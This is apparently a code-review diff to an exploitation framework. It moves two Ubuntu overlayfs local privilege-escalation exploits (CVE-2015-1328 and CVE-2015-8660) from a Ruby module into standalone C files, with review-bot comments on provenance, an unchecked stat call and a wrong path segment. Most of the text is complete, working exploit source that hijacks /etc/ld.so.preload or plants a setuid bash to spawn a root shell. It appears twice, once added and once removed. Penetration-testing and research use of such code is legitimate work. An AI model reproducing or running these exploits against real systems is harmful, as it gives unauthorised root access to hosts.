diff --git a/external/source/exploits/CVE-2015-1328/1328.c b/external/source/exploits/CVE-2015-1328/1328.c
new file mode 100644
index 0000000000..ac73c06ed4
--- /dev/null
+++ b/external/source/exploits/CVE-2015-1328/1328.c
@@ -0,0 +1,112 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"
+
+static char child_stack[1024*1024];
+
+static int
+child_exec(void *stuff)
+{
+ char *file;
+ system("rm -rf /tmp/ns_sploit");
+ mkdir("/tmp/ns_sploit", 0777);
+ mkdir("/tmp/ns_sploit/work", 0777);
+ mkdir("/tmp/ns_sploit/upper",0777);
+ mkdir("/tmp/ns_sploit/o",0777);
+
+ fprintf(stderr,"mount #1\n");
+ if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
+// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
+ if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
+ fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
+ exit(-1);
+ }
+ file = ".access";
+ chmod("/tmp/ns_sploit/work/work",0777);
+ } else file = "ns_last_pid";
+
+ chdir("/tmp/ns_sploit/o");
+ rename(file,"ld.so.preload");
+
+ chdir("/");
+ umount("/tmp/ns_sploit/o");
+ fprintf(stderr,"mount #2\n");
+ if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
+ if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
+ exit(-1);
+ }
+ chmod("/tmp/ns_sploit/work/work",0777);
+ }
+
+ chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
+ umount("/tmp/ns_sploit/o");
+}
+
+int
+main(int argc, char **argv)
+{
+ int status, fd, lib;
+ pid_t wrapper, init;
+ int clone_flags = CLONE_NEWNS | SIGCHLD;
+
+ fprintf(stderr,"spawning threads\n");
+
+ if((wrapper = fork()) == 0) {
+ if(unshare(CLONE_NEWUSER) != 0)
+ fprintf(stderr, "failed to create new user namespace\n");
+
+ if((init = fork()) == 0) {
+ pid_t pid =
+ clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
+ if(pid < 0) {
+ fprintf(stderr, "failed to create new mount namespace\n");
+ exit(-1);
+ }
+
+ waitpid(pid, &status, 0);
+
+ }
+
+ waitpid(init, &status, 0);
+ return 0;
+ }
+
+ usleep(300000);
+
+ wait(NULL);
+
+ fprintf(stderr,"child threads done\n");
+
+ fd = open("/etc/ld.so.preload",O_WRONLY);
+
+ if(fd == -1) {
+ fprintf(stderr,"exploit failed\n");
+ exit(-1);
+ }
+
+ fprintf(stderr,"/etc/ld.so.preload created\n");
+ fprintf(stderr,"creating shared library\n");
+ lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
+ write(lib,LIB,strlen(LIB));
+ close(lib);
+ lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
+ if(lib != 0) {
+ fprintf(stderr,"couldn't create dynamic library\n");
+ exit(-1);
+ }
+ write(fd,"/tmp/ofs-lib.so\n",16);
+ close(fd);
+ system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
+ execl("/bin/su","su",NULL);
+}
+
diff --git a/external/source/exploits/CVE-2015-8660/8660.c b/external/source/exploits/CVE-2015-8660/8660.c
new file mode 100644
index 0000000000..432368a108
--- /dev/null
+++ b/external/source/exploits/CVE-2015-8660/8660.c
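Review bot: Neither new source file opens with a header comment, so the provenance that the module kept beside the embedded code (author, date, CVE id and tested Ubuntu releases, visible as removed lines in overlayfs_priv_esc.rb) is lost by this commit; the same applies to 8660.c. A block comment at the top of each file should restate that provenance and list the paths the program creates or modifies (`/tmp/ns_sploit`, `/tmp/ofs-lib.c`, `/tmp/ofs-lib.so`, `/etc/ld.so.preload`), so the artifacts left on a host are documented for cleanup and for detection. Separately, `child_exec` is declared `static int` but reaches its closing brace without returning a value; `return 0;` after the final `umount` would match the 8660.c version.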
@@ -0,0 +1,78 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+static char child_stack[1024*1024];
+
+static int
+child_exec(void *stuff)
+{
+ system("rm -rf /tmp/haxhax");
+ mkdir("/tmp/haxhax", 0777);
+ mkdir("/tmp/haxhax/w", 0777);
+ mkdir("/tmp/haxhax/u",0777);
+ mkdir("/tmp/haxhax/o",0777);
+
+ if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {
+ fprintf(stderr,"mount failed..\n");
+ }
+
+ chmod("/tmp/haxhax/w/work",0777);
+ chdir("/tmp/haxhax/o");
+ chmod("bash",04755);
+ chdir("/");
+ umount("/tmp/haxhax/o");
+ return 0;
+}
+
+int
+main(int argc, char **argv)
+{
+ int status;
+ pid_t wrapper, init;
+ int clone_flags = CLONE_NEWNS | SIGCHLD;
+ struct stat s;
+
+ if((wrapper = fork()) == 0) {
+ if(unshare(CLONE_NEWUSER) != 0)
+ fprintf(stderr, "failed to create new user namespace\n");
+
+ if((init = fork()) == 0) {
+ pid_t pid =
+ clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
+ if(pid < 0) {
+ fprintf(stderr, "failed to create new mount namespace\n");
+ exit(-1);
+ }
+
+ waitpid(pid, &status, 0);
+
+ }
+
+ waitpid(init, &status, 0);
+ return 0;
+ }
+
+ usleep(300000);
+
+ wait(NULL);
+
+ stat("/tmp/haxhax/u/bash",&s);
+
+ if(s.st_mode == 0x89ed)
+ execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);
+
+ fprintf(stderr,"couldn't create suid :(\n");
+ return -1;
+}
diff --git a/modules/exploits/linux/local/overlayfs_priv_esc.rb b/modules/exploits/linux/local/overlayfs_priv_esc.rb
index 73c973009d..50aec4c029 100644
--- a/modules/exploits/linux/local/overlayfs_priv_esc.rb
+++ b/modules/exploits/linux/local/overlayfs_priv_esc.rb
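Review bot: The return value of `stat("/tmp/haxhax/u/bash",&s)` near the end of `main` is ignored, so when the file does not exist `s.st_mode` is read uninitialised and the comparison that follows is indeterminate. Checking the call and writing the constant symbolically makes the intent readable: `if (stat("/tmp/haxhax/u/bash", &s) == 0 && s.st_mode == (S_IFREG | S_ISUID | 0755))`. The literal `0x89ed` is octal 0104755, i.e. a regular file with the setuid bit and mode 755. A one-line comment saying so would also document the on-disk artifact (a setuid file under `/tmp/haxhax/u`) for anyone triaging a host.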
@@ -163,214 +163,14 @@ class MetasploitModule < Msf::Exploit::Local # direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size - # Exploit Title: ofs.c - overlayfs local root in ubuntu - # Date: 2015-06-15 - # Exploit Author: rebel - # Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15) - # Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04 - # CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html) - - cve_2015_1328 = %q{ - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - - #define LIB "#include \n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n" - - static char child_stack[1024*1024]; - - static int - child_exec(void *stuff) - { - char *file; - system("rm -rf /tmp/ns_sploit"); - mkdir("/tmp/ns_sploit", 0777); - mkdir("/tmp/ns_sploit/work", 0777); - mkdir("/tmp/ns_sploit/upper",0777); - mkdir("/tmp/ns_sploit/o",0777); - - fprintf(stderr,"mount #1\n"); - if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) { - // workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower - if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) { - fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n"); - exit(-1); - } - file = ".access"; - 
chmod("/tmp/ns_sploit/work/work",0777); - } else file = "ns_last_pid"; - - chdir("/tmp/ns_sploit/o"); - rename(file,"ld.so.preload"); - - chdir("/"); - umount("/tmp/ns_sploit/o"); - fprintf(stderr,"mount #2\n"); - if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) { - if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) { - exit(-1); - } - chmod("/tmp/ns_sploit/work/work",0777); - } - - chmod("/tmp/ns_sploit/o/ld.so.preload",0777); - umount("/tmp/ns_sploit/o"); - } - - int - main(int argc, char **argv) - { - int status, fd, lib; - pid_t wrapper, init; - int clone_flags = CLONE_NEWNS | SIGCHLD; - - fprintf(stderr,"spawning threads\n"); - - if((wrapper = fork()) == 0) { - if(unshare(CLONE_NEWUSER) != 0) - fprintf(stderr, "failed to create new user namespace\n"); - - if((init = fork()) == 0) { - pid_t pid = - clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); - if(pid < 0) { - fprintf(stderr, "failed to create new mount namespace\n"); - exit(-1); - } - - waitpid(pid, &status, 0); - - } - - waitpid(init, &status, 0); - return 0; - } - - usleep(300000); - - wait(NULL); - - fprintf(stderr,"child threads done\n"); - - fd = open("/etc/ld.so.preload",O_WRONLY); - - if(fd == -1) { - fprintf(stderr,"exploit failed\n"); - exit(-1); - } - - fprintf(stderr,"/etc/ld.so.preload created\n"); - fprintf(stderr,"creating shared library\n"); - lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777); - write(lib,LIB,strlen(LIB)); - close(lib); - lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); - if(lib != 0) { - fprintf(stderr,"couldn't create dynamic library\n"); - exit(-1); - } - write(fd,"/tmp/ofs-lib.so\n",16); - close(fd); - system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c"); - execl("/bin/su","su",NULL); - } - } + path = ::File.join( Msf::Config.install_root, 'external', 'sources', 
'exploits', 'CVE-2015-1328', '1328.c') + fd = ::File.open( path, "rb") + cve_2015_1328 = fd.read(fd.stat.size) # direct copy of code from exploit-db. There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size - # Exploit Title: overlayfs local root - # Date: 2016-01-05 - # Exploit Author: rebel - # Version: Ubuntu 14.04 LTS, 15.10 and more - # Tested on: Ubuntu 14.04 LTS, 15.10 - # CVE : CVE-2015-8660 - cve_2015_8660 = %q{ - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - #include - - static char child_stack[1024*1024]; - - static int - child_exec(void *stuff) - { - system("rm -rf /tmp/haxhax"); - mkdir("/tmp/haxhax", 0777); - mkdir("/tmp/haxhax/w", 0777); - mkdir("/tmp/haxhax/u",0777); - mkdir("/tmp/haxhax/o",0777); - - if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) { - fprintf(stderr,"mount failed..\n"); - } - - chmod("/tmp/haxhax/w/work",0777); - chdir("/tmp/haxhax/o"); - chmod("bash",04755); - chdir("/"); - umount("/tmp/haxhax/o"); - return 0; - } - - int - main(int argc, char **argv) - { - int status; - pid_t wrapper, init; - int clone_flags = CLONE_NEWNS | SIGCHLD; - struct stat s; - - if((wrapper = fork()) == 0) { - if(unshare(CLONE_NEWUSER) != 0) - fprintf(stderr, "failed to create new user namespace\n"); - - if((init = fork()) == 0) { - pid_t pid = - clone(child_exec, child_stack + (1024*1024), clone_flags, NULL); - if(pid < 0) { - fprintf(stderr, "failed to create new mount namespace\n"); - exit(-1); - } - - waitpid(pid, &status, 0); - - } - - waitpid(init, &status, 0); - return 0; - } - - usleep(300000); - - wait(NULL); - - stat("/tmp/haxhax/u/bash",&s); - - if(s.st_mode == 0x89ed) - execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import 
os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL); - - fprintf(stderr,"couldn't create suid :(\n"); - return -1; - } - } + path = ::File.join( Msf::Config.install_root, 'external', 'sources', 'exploits', 'CVE-2015-8660', '8660.c') + fd = ::File.open( path, "rb") + cve_2015_8660 = fd.read(fd.stat.size) filename = rand_text_alphanumeric(8) executable_path = "#{datastore['WritableDir']}/#{filename}"
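Review bot: Both added `::File.join` calls build the path from `'external', 'sources', 'exploits'`, but this commit adds the C files under `external/source/exploits/...`, so unless a `sources` directory exists elsewhere in the tree `::File.open` will raise `Errno::ENOENT` for both the CVE-2015-1328 and the CVE-2015-8660 read; the segment should be `'source'`. The handle `fd` is never closed and is reused for the second file; `cve_2015_1328 = ::File.binread(path)` (and likewise for `cve_2015_8660`) reads the file and closes it in one call. The retained comments "direct copy of code from exploit-db…" now sit above file reads and would be better replaced by a pointer to the new .c files. The enclosing method starts and ends outside this hunk.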